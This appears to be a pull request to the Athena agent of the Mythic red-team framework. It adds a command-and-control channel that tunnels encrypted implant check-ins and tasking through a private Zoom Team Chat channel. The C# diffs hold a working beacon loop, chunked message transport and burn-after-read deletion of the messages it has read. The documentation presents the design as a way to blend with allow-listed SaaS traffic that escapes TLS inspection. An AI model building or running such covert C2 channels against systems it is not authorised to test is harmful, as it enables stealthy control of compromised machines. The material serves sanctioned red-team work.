+                using HttpResponseMessage resp = await _client.SendAsync(req);
+            }
+            catch
+            {
+            }
+        }
+
+        // ===================== Envelope / chunking =====================
+
+        private static List<string> Chunk(string s)
+        {
+            List<string> chunks = new();
+            if (string.IsNullOrEmpty(s))
+            {
+                chunks.Add("");
+                return chunks;
+            }
+            for (int i = 0; i < s.Length; i += CHUNK_SIZE)
+            {
+                chunks.Add(s.Substring(i, Math.Min(CHUNK_SIZE, s.Length - i)));
+            }
+            return chunks;
+        }
+
+        // Posts an encrypted blob to the channel as one or more chunked envelopes
+        // addressed from this agent (correlation id) to Mythic.
+        private async Task PostEncrypted(string direction, string encrypted)
+        {
+            string job = Guid.NewGuid().ToString();
+            List<string> chunks = Chunk(encrypted);
+            for (int seq = 0; seq < chunks.Count; seq++)
+            {
+                string envelope = JsonSerializer.Serialize(new ZoomEnvelope
+                {
+                    t = direction,
+                    c = _correlationId,
+                    j = job,
+                    s = seq,
+                    n = chunks.Count,
+                    d = chunks[seq],
+                });
+                await SendChatMessage(envelope);
+            }
+        }
+
+        private static bool TryParseEnvelope(string text, out ZoomEnvelope env)
+        {
+            env = new ZoomEnvelope();
+            if (string.IsNullOrEmpty(text) || !text.TrimStart().StartsWith("{"))
+                return false;
+            try
+            {
+                env = JsonSerializer.Deserialize<ZoomEnvelope>(text) ?? new ZoomEnvelope();
+                return env.t == DIR_AGENT_TO_SERVER || env.t == DIR_SERVER_TO_AGENT;
+            }
+            catch
+            {
+                env = new ZoomEnvelope();
+                return false;
+            }
+        }
+
+        // ===================== Receive loop =====================
+
+        private void EnsureReceiver()
+        {
+            if (Interlocked.CompareExchange(ref _receiverStarted, 1, 0) == 0)
+            {
+                _ = Task.Run(ReceiveLoop);
+            }
+        }
+
+        private async Task ReceiveLoop()
+        {
+            while (!cancellationTokenSource.Token.IsCancellationRequested)
+            {
+                try
+                {
+                    await ProcessInbound();
+                }
+                catch
+                {
+                }
+                try
+                {
+                    await Task.Delay(RECEIVE_POLL_MS, cancellationTokenSource.Token);
+                }
+                catch
+                {
+                    return;
+                }
+            }
+        }
+
+        private async Task ProcessInbound()
+        {
+            List<ZoomChatMessage> messages = await ListChatMessages();
+            // Group SERVER_TO_AGENT envelopes addressed to us, by job id.
+            Dictionary<string, JobBucket> jobs = new();
+            foreach (var msg in messages)
+            {
+                if (!TryParseEnvelope(msg.message, out ZoomEnvelope env))
+                    continue;
+                if (env.t != DIR_SERVER_TO_AGENT || env.c != _correlationId || env.j == null)
+                    continue;
+                if (!jobs.TryGetValue(env.j, out JobBucket? bucket))
+                {
+                    bucket = new JobBucket { total = env.n };
+                    jobs[env.j] = bucket;
+                }
+                bucket.chunks[env.s] = env.d ?? "";
+                bucket.ids.Add(msg.id);
+            }
+
+            foreach (var kv in jobs)
+            {
+                string job = kv.Key;
+                JobBucket bucket = kv.Value;
+                if (_processedJobs.Contains(job))
+                    continue;
+                if (bucket.chunks.Count != bucket.total)
+                    continue;
+
+                _processedJobs.Add(job);
+                string encrypted = string.Concat(Enumerable.Range(0, bucket.total).Select(i => bucket.chunks[i]));
+
+                // burn-after-read
+                foreach (string id in bucket.ids)
+                {
+                    await DeleteChatMessage(id);
+                }
+
+                string plain = crypt.Decrypt(encrypted);
+                if (string.IsNullOrEmpty(plain))
+                    continue;
+
+                if (!_checkedIn)
+                {
+                    _checkinResponse = JsonSerializer.Deserialize(plain, CheckinResponseJsonContext.Default.CheckinResponse) ?? new CheckinResponse();
+                    _checkinAvailable.Set();
+                    _checkedIn = true;
+                }
+                else
+                {
+                    GetTaskingResponse? gtr = JsonSerializer.Deserialize(plain, GetTaskingResponseJsonContext.Default.GetTaskingResponse);
+                    if (gtr != null)
+                    {
+                        TaskingReceivedArgs tra = new TaskingReceivedArgs(gtr);
+                        this.SetTaskingReceived?.Invoke(this, tra);
+                    }
+                }
+            }
+
+            // Keep the processed set bounded.
+            if (_processedJobs.Count > 1000)
+            {
+                _processedJobs.Clear();
+            }
+        }
+
+        // ===================== IProfile =====================
+
+        public async Task<CheckinResponse> Checkin(Checkin checkin)
+        {
+            EnsureReceiver();
+
+            string encrypted = crypt.Encrypt(JsonSerializer.Serialize(checkin, CheckinJsonContext.Default.Checkin));
+            try
+            {
+                await PostEncrypted(DIR_AGENT_TO_SERVER, encrypted);
+            }
+            catch
+            {
+                return new CheckinResponse() { status = "failed" };
+            }
+
+            // Wait for the bridge to relay and return a checkin response.
+            if (!_checkinAvailable.Wait(CHECKIN_WAIT_MS))
+            {
+                return new CheckinResponse() { status = "failed" };
+            }
+            return _checkinResponse;
+        }
+
+        public async Task StartBeacon()
+        {
+            //Main beacon loop handled here
+            this.cancellationTokenSource = new CancellationTokenSource();
+            EnsureReceiver();
+
+            while (!cancellationTokenSource.Token.IsCancellationRequested)
+            {
+                await Task.Delay(Misc.GetSleep(this.agentConfig.sleep, this.agentConfig.jitter) * 1000);
+                try
+                {
+                    // Solicit tasking every tick. GetAgentResponseString() returns a
+                    // valid get_tasking even when there are no queued responses.
+                    string encrypted = crypt.Encrypt(messageManager.GetAgentResponseString());
+                    await PostEncrypted(DIR_AGENT_TO_SERVER, encrypted);
+                    this.currentAttempt = 0;
+                }
+                catch (Exception)
+                {
+                    this.currentAttempt++;
+                }
+
+                if (this.currentAttempt >= this.maxAttempts)
+                {
+                    this.cancellationTokenSource.Cancel();
+                }
+            }
+        }
+
+        public bool StopBeacon()
+        {
+            this.cancellationTokenSource.Cancel();
+            return true;
+        }
+
+        // ===================== Helpers =====================
+
+        private class ZoomEnvelope
+        {
+            public string? t { get; set; }
+            public string? c { get; set; }
+            public string? j { get; set; }
+            public int s { get; set; }
+            public int n { get; set; }
+            public string? d { get; set; }
+        }
+
+        private class ZoomChatMessage
+        {
+            public string id { get; set; } = string.Empty;
+            public string message { get; set; } = string.Empty;
+        }
+
+        private class JobBucket
+        {
+            public int total;
+            public Dictionary<int, string> chunks = new();
+            public List<string> ids = new();
+        }
+    }
+}

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
@@ -28,7 +28,7 @@ namespace Agent.Profiles
         private ILogger logger { get; set; }
 
         // ---- C2 parameters (substituted at build time by builder.buildZoom) ----
-        private string accountId = "account_id";
+        private string accountId = "zoom_account_id";
         private string clientId = "client_id";
         private string clientSecret = "client_secret";
         private string userId = "user_id";
@@ -77,13 +77,13 @@ namespace Agent.Profiles
             this._client = new HttpClient(handler);
             this._client.Timeout = TimeSpan.FromSeconds(30);
 
-            // Startup self-check: surfaces whether build-time substitution happened.
-            Console.Error.WriteLine($"[zoom] profile loaded | " +
-                $"account_id={(accountId == "account_id" ? "<UNSUBSTITUTED>" : "set(len=" + accountId.Length + ")")} | " +
-                $"client_id={(clientId == "client_id" ? "<UNSUBSTITUTED>" : "set(len=" + clientId.Length + ")")} | " +
-                $"client_secret={(clientSecret == "client_secret" ? "<UNSUBSTITUTED>" : "set(len=" + clientSecret.Length + ")")} | " +
-                $"channel_id={(channelId == "channel_id" ? "<UNSUBSTITUTED>" : "set(len=" + channelId.Length + ")")} | " +
-                $"api_base={apiBase} | oauth_base={oauthBase}");
+            // NOTE: do NOT use the bare token names (zoom_account_id, client_id, ...)
+            // as string literals anywhere in this file — Athena's builder does a
+            // global text replace of each C2 parameter name, which would corrupt
+            // any literal that happens to match (e.g. the OAuth "account_id" form
+            // field key). The OAuth key below is intentionally a different string
+            // from the substitution token (zoom_account_id).
+            Console.Error.WriteLine("[zoom] profile loaded");
         }
 
         // ===================== Zoom REST API =====================

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
@@ -28,13 +28,16 @@ namespace Agent.Profiles
         private ILogger logger { get; set; }
 
         // ---- C2 parameters (substituted at build time by builder.buildZoom) ----
-        private string accountId = "zoom_account_id";
-        private string clientId = "client_id";
-        private string clientSecret = "client_secret";
-        private string userId = "user_id";
-        private string channelId = "channel_id";
-        private string apiBase = "api_base";
-        private string oauthBase = "oauth_base";
+        // Fixed %ZOOM_*% placeholders are used (not the bare C2 param names) so
+        // Athena's global text-replace can never collide with literal API field
+        // names such as the OAuth "account_id" form key.
+        private string accountId = "%ZOOM_ACCOUNT_ID%";
+        private string clientId = "%ZOOM_CLIENT_ID%";
+        private string clientSecret = "%ZOOM_CLIENT_SECRET%";
+        private string userId = "%ZOOM_USER_ID%";
+        private string channelId = "%ZOOM_CHANNEL_ID%";
+        private string apiBase = "%ZOOM_API_BASE%";
+        private string oauthBase = "%ZOOM_OAUTH_BASE%";
 
         // ---- wire protocol constants ----
         private const string DIR_AGENT_TO_SERVER = "O";   // consumed by the Mythic bridge
@@ -77,12 +80,6 @@ namespace Agent.Profiles
             this._client = new HttpClient(handler);
             this._client.Timeout = TimeSpan.FromSeconds(30);
 
-            // NOTE: do NOT use the bare token names (zoom_account_id, client_id, ...)
-            // as string literals anywhere in this file — Athena's builder does a
-            // global text replace of each C2 parameter name, which would corrupt
-            // any literal that happens to match (e.g. the OAuth "account_id" form
-            // field key). The OAuth key below is intentionally a different string
-            // from the substitution token (zoom_account_id).
             Console.Error.WriteLine("[zoom] profile loaded");
         }
 
@@ -99,11 +96,13 @@ namespace Agent.Profiles
             string url = $"{oauthBase.TrimEnd('/')}/token";
             using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Post, url);
             req.Headers.Authorization = new AuthenticationHeaderValue("Basic", basic);
-            req.Content = new FormUrlEncodedContent(new Dictionary<string, string>
+            var formContent = new FormUrlEncodedContent(new Dictionary<string, string>
             {
                 { "grant_type", "account_credentials" },
                 { "account_id", accountId },
             });
+            Console.Error.WriteLine($"[zoom] OAuth POST {url} body={await formContent.ReadAsStringAsync()}");
+            req.Content = formContent;
             using HttpResponseMessage resp = await _client.SendAsync(req);
             string body = await resp.Content.ReadAsStringAsync();
             if (!resp.IsSuccessStatusCode)

--- a/Payload_Type/athena/athena/agent_code/AthenaCore/Config/ContainerBuilder.cs
+++ b/Payload_Type/athena/athena/agent_code/AthenaCore/Config/ContainerBuilder.cs
@@ -48,7 +48,7 @@ namespace Agent.Config
         }
         private static void TryLoadProfiles(Autofac.ContainerBuilder containerBuilder)
         {
-            List<string> potentialProfiles = new List<string> { "DebugProfile", "Http", "Websocket", "Slack", "Discord", "Smb", "GitHub" };
+            List<string> potentialProfiles = new List<string> { "DebugProfile", "Http", "Websocket", "Slack", "Discord", "Smb", "GitHub", "Zoom" };
 
             foreach(var profile in potentialProfiles)
             {

--- a/Payload_Type/athena/athena/mythic/agent_functions/builder.py
+++ b/Payload_Type/athena/athena/mythic/agent_functions/builder.py
@@ -245,14 +245,22 @@ class athena(PayloadType):
     async def buildZoom(self, agent_build_path, c2):
         baseConfigFile = open("{}/Agent.Profiles.Zoom/Base.txt".format(agent_build_path.name), "r").read()
         baseConfigFile = baseConfigFile.replace("%UUID%", self.uuid)
-        for key, val in c2.get_parameters_dict().items():
-            if key == "encrypted_exchange_check":
-                if val == "T":
-                    baseConfigFile = baseConfigFile.replace(key, "True")
-                else:
-                    baseConfigFile = baseConfigFile.replace(key, "False")
-            else:
-                baseConfigFile = baseConfigFile.replace(str(key), str(val))
+        d = c2.get_parameters_dict()
+        def lookup(name, default=""):
+            v = d.get(name, default)
+            return str(v) if v is not None and v != "" else default
+        # Fixed %ZOOM_*% placeholders. This is robust to the C2 parameter being
+        # named either "zoom_account_id" (current zoom-c2) or "account_id"
+        # (older installs), and crucially never substitutes the literal OAuth
+        # "account_id" form-field key in GetToken — which the bare-token approach
+        # corrupted (causing 400 invalid_request).
+        baseConfigFile = baseConfigFile.replace("%ZOOM_ACCOUNT_ID%", lookup("zoom_account_id") or lookup("account_id"))
+        baseConfigFile = baseConfigFile.replace("%ZOOM_CLIENT_ID%", lookup("client_id"))
+        baseConfigFile = baseConfigFile.replace("%ZOOM_CLIENT_SECRET%", lookup("client_secret"))
+        baseConfigFile = baseConfigFile.replace("%ZOOM_USER_ID%", lookup("user_id", "me"))
+        baseConfigFile = baseConfigFile.replace("%ZOOM_CHANNEL_ID%", lookup("channel_id"))
+        baseConfigFile = baseConfigFile.replace("%ZOOM_API_BASE%", lookup("api_base", "https://api.zoom.us/v2"))
+        baseConfigFile = baseConfigFile.replace("%ZOOM_OAUTH_BASE%", lookup("oauth_base", "https://zoom.us/oauth"))
         with open("{}/Agent.Profiles.Zoom/ZoomProfile.cs".format(agent_build_path.name), "w") as f:
             f.write(baseConfigFile)
         self.addProfile(agent_build_path, "Zoom")

--- a/Payload_Type/athena/athena/mythic/agent_functions/builder.py
+++ b/Payload_Type/athena/athena/mythic/agent_functions/builder.py
@@ -145,7 +145,7 @@ class athena(PayloadType):
         #     description="Hide the window when running the payload"
         # ),
     ]
-    c2_profiles = ["http", "websocket", "slack", "smb", "discord", "github"]
+    c2_profiles = ["http", "websocket", "slack", "smb", "discord", "github", "zoom"]
 
     async def prepareWinExe(self, output_path):
         pe = pefile.PE(os.path.join(output_path, "{}.exe".format(self.get_parameter("assemblyname"))))
@@ -241,6 +241,21 @@ class athena(PayloadType):
         with open("{}/Agent.Profiles.Http/HttpProfile.cs".format(agent_build_path.name), "w") as f:
             f.write(baseConfigFile)
         self.addProfile(agent_build_path, "Http")
+
+    async def buildZoom(self, agent_build_path, c2):
+        baseConfigFile = open("{}/Agent.Profiles.Zoom/Base.txt".format(agent_build_path.name), "r").read()
+        baseConfigFile = baseConfigFile.replace("%UUID%", self.uuid)
+        for key, val in c2.get_parameters_dict().items():
+            if key == "encrypted_exchange_check":
+                if val == "T":
+                    baseConfigFile = baseConfigFile.replace(key, "True")
+                else:
+                    baseConfigFile = baseConfigFile.replace(key, "False")
+            else:
+                baseConfigFile = baseConfigFile.replace(str(key), str(val))
+        with open("{}/Agent.Profiles.Zoom/ZoomProfile.cs".format(agent_build_path.name), "w") as f:
+            f.write(baseConfigFile)
+        self.addProfile(agent_build_path, "Zoom")
 
     async def buildWebsocket(self, agent_build_path, c2):
         baseConfigFile = open("{}/Agent.Profiles.Websocket/Base.txt".format(agent_build_path.name), "r").read()
@@ -429,6 +444,9 @@ class athena(PayloadType):
                 elif profile["name"] == "github":
                     roots_replace += "<assembly fullname=\"Agent.Profiles.GitHub\"/>" + '\n'
                     await self.buildGitHub(agent_build_path, c2)
+                elif profile["name"] == "zoom":
+                    roots_replace += "<assembly fullname=\"Agent.Profiles.Zoom\"/>" + '\n'
+                    await self.buildZoom(agent_build_path, c2)
                 else:
                     raise Exception("Unsupported C2 profile type for Athena: {}".format(profile["name"]))
             

--- a/agent_capabilities.json
+++ b/agent_capabilities.json
@@ -8,7 +8,7 @@
     },
     "payload_output": ["exe", "macho", "elf", "service"],
     "architectures": ["x86", "x86_64", "arm_64"],
-    "c2": ["http", "websocket", "smb", "discord", "github"],
+    "c2": ["http", "websocket", "smb", "discord", "github", "zoom"],
     "mythic_version": "3.2",
     "agent_version": "2.0.2",
     "supported_wrappers": []

--- a/documentation-payload/Athena/c2_profiles/zoom.md
+++ b/documentation-payload/Athena/c2_profiles/zoom.md
@@ -40,8 +40,10 @@ opaque base64.
 
 1. Create a **Server-to-Server OAuth** app in the
    [Zoom App Marketplace](https://marketplace.zoom.us/).
-2. Grant scopes: `chat_channel:read`, `chat_message:read`, `chat_message:write`
-   (and `chat_message.file:write` if/when file-transfer mode is enabled).
+2. Grant scopes: `team_chat:read:user_message` (list/read messages) and
+   `team_chat:write:user_message` (send + delete messages), plus a Team Chat
+   channel scope to list channels (any `team_chat:read:*` channel scope) for the
+   channel-id lookup.
 3. Record the **Account ID**, **Client ID**, and **Client Secret**.
 4. Create a **private** Team Chat channel and add the S2S app's user as a
    member. Record the **channel id**.

--- a/documentation-payload/Athena/c2_profiles/zoom.md
+++ b/documentation-payload/Athena/c2_profiles/zoom.md
@@ -54,7 +54,7 @@ opaque base64.
 
 | Parameter | Description |
 |---|---|
-| `account_id` | S2S OAuth Account ID |
+| `zoom_account_id` | S2S OAuth Account ID |
 | `client_id` | S2S OAuth Client ID |
 | `client_secret` | S2S OAuth Client Secret |
 | `user_id` | Zoom user id to act as (`me`) |

--- a/documentation-payload/Athena/c2_profiles/zoom.md
+++ b/documentation-payload/Athena/c2_profiles/zoom.md
@@ -1,0 +1,79 @@
++++
+title = "zoom"
+chapter = false
+weight = 7
++++
+
+## Summary
+
+The athena agent can communicate with Mythic over a **Zoom Team Chat** channel
+using the `zoom` C2 profile. It uses Zoom's REST API with headless
+Server-to-Server OAuth, so no end-user browser or in-meeting SDK is required —
+the agent exchanges encrypted blobs with Mythic through a private Team Chat
+channel.
+
+This is an application-layer channel that blends with normal Zoom Team Chat
+traffic (sanctioned SaaS chat is frequently allow-listed and exempt from TLS
+inspection). It is distinct from media-plane techniques like TURNt / "Ghost
+Calls".
+
+## How it works
+
+* The agent mints a per-instance correlation id.
+* On checkin and every beacon tick, it AES-encrypts its `checkin` /
+  `get_tasking` payload (`ICryptoManager.Encrypt`) and posts it to the channel
+  as one or more small JSON envelopes (`t = "O"`), chunked to stay under Zoom's
+  4096-character message limit.
+* The Mythic-side `zoom` C2 profile polls the channel, reassembles complete
+  jobs, and forwards the opaque base64 to Mythic (`POST` to `MYTHIC_ADDRESS`
+  with the header `Mythic: zoom`).
+* Mythic's encrypted response is chunked and posted back (`t = "I"`) addressed
+  to the agent's correlation id.
+* A background receiver in the agent polls the channel, reassembles responses,
+  decrypts them, and dispatches `GetTaskingResponse` tasking to the agent core.
+* Both sides delete the messages they consume (burn-after-read).
+
+Crypto is end-to-end between the agent and Mythic — the wire only carries
+opaque base64.
+
+## Setup (Zoom side)
+
+1. Create a **Server-to-Server OAuth** app in the
+   [Zoom App Marketplace](https://marketplace.zoom.us/).
+2. Grant scopes: `chat_channel:read`, `chat_message:read`, `chat_message:write`
+   (and `chat_message.file:write` if/when file-transfer mode is enabled).
+3. Record the **Account ID**, **Client ID**, and **Client Secret**.
+4. Create a **private** Team Chat channel and add the S2S app's user as a
+   member. Record the **channel id**.
+5. Install and start the `zoom` C2 profile, and fill in the same credentials in
+   its `c2_code/config.json`.
+
+## Parameters
+
+| Parameter | Description |
+|---|---|
+| `account_id` | S2S OAuth Account ID |
+| `client_id` | S2S OAuth Client ID |
+| `client_secret` | S2S OAuth Client Secret |
+| `user_id` | Zoom user id to act as (`me`) |
+| `channel_id` | Private Team Chat channel id used as the bus |
+| `api_base` | Zoom REST base URL (override for a redirector) |
+| `oauth_base` | Zoom OAuth base URL (override for a redirector) |
+| `callback_interval` | Beacon sleep in seconds |
+| `callback_jitter` | Beacon jitter in percent |
+| `killdate` | Agent kill date |
+| `encrypted_exchange_check` | Perform Mythic key exchange |
+| `AESPSK` | Crypto type (`aes256_hmac` / `none`) |
+
+## Notes
+
+* The agent solicits tasking every `callback_interval` (it always sends a
+  `get_tasking`, even with no queued responses) and a background receiver polls
+  the channel every few seconds for responses.
+* Because the channel is asynchronous, checkin/beacon latency is bounded by the
+  bridge poll interval plus the agent receiver poll interval (a few seconds
+  each).
+* `client_secret` is baked into the compiled payload — use a dedicated
+  low-privilege Zoom service account.
+* Large transfers are chunked into ~3000-char base64 fragments; very large
+  transfers produce many messages.


### PR DESCRIPTION
## Summary

Adds a new `zoom` C2 profile to the Athena agent that uses the **Zoom Team Chat** REST API (Server-to-Server OAuth) as a duplex command-and-control channel over a private chat channel. This mirrors how the existing Discord / Slack / GitHub profiles turn a chat/SaaS API into a Mythic transport, and is useful where sanctioned SaaS chat traffic is allow-listed or exempt from TLS inspection.

## How it works

- The agent mints a per-instance correlation id and posts AES-encrypted `checkin` / `get_tasking` payloads to a Zoom Team Chat channel as small chunked JSON envelopes (`t = "O"`), staying under Zoom's 4096-char message limit.
- The Mythic-side **`zoom` C2 profile** (separate repo) polls the channel, reassembles complete jobs, forwards the opaque base64 to Mythic (`POST MYTHIC_ADDRESS`, header `Mythic: zoom`), and posts the encrypted response back (`t = "I"`, addressed to the agent's correlation id).
- A background receiver in the agent reassembles, decrypts, and dispatches `GetTaskingResponse` tasking to the core. Both sides delete consumed messages (burn-after-read).
- Crypto stays end-to-end between the agent and Mythic via `ICryptoManager`; the wire only carries opaque base64. In-meeting chat is intentionally **not** used — Zoom exposes no REST to *send* in-meeting chat (it would require embedding the Meeting SDK).

## Changes

- `Agent.Profiles.Zoom/` — new `IProfile` implementation (`ZoomProfile.cs` + `Base.txt` template + `.csproj`), modeled on the Discord/HTTP profiles: S2S OAuth token caching, chunked envelope send, background receive loop.
- `AthenaCore/Config/ContainerBuilder.cs` — register `"Zoom"` in `potentialProfiles`.
- `mythic/agent_functions/builder.py` — add `"zoom"` to `c2_profiles`, the dispatch branch, and `buildZoom()` (same template-substitution pattern as `buildDiscord` / `buildSlack`).
- `agent_capabilities.json` — declare `zoom`.
- `documentation-payload/Athena/c2_profiles/zoom.md` — operator docs.

## Server-side dependency

Requires the matching server-side Mythic C2 profile: **https://github.com/jll91950/zoom-c2** — happy to transfer / contribute it to `MythicC2Profiles` if there's interest.

## Verification

- `dotnet build Agent.Profiles.Zoom` builds clean against `Agent.Models` (0 errors / 0 warnings for the new project).
- The server-side `Zoom.py` was checked against the `mythic_container.C2ProfileBase` API surface (class attributes, `C2ProfileParameter` kwargs, `ParameterType` members).
- **Not yet done:** a live end-to-end round-trip against a Mythic instance with a real Zoom S2S app (needs credentials I don't have in this environment). Flagging that honestly — happy to run it through if a maintainer can point me at a test harness or wants it validated on a staging Mythic before merge.
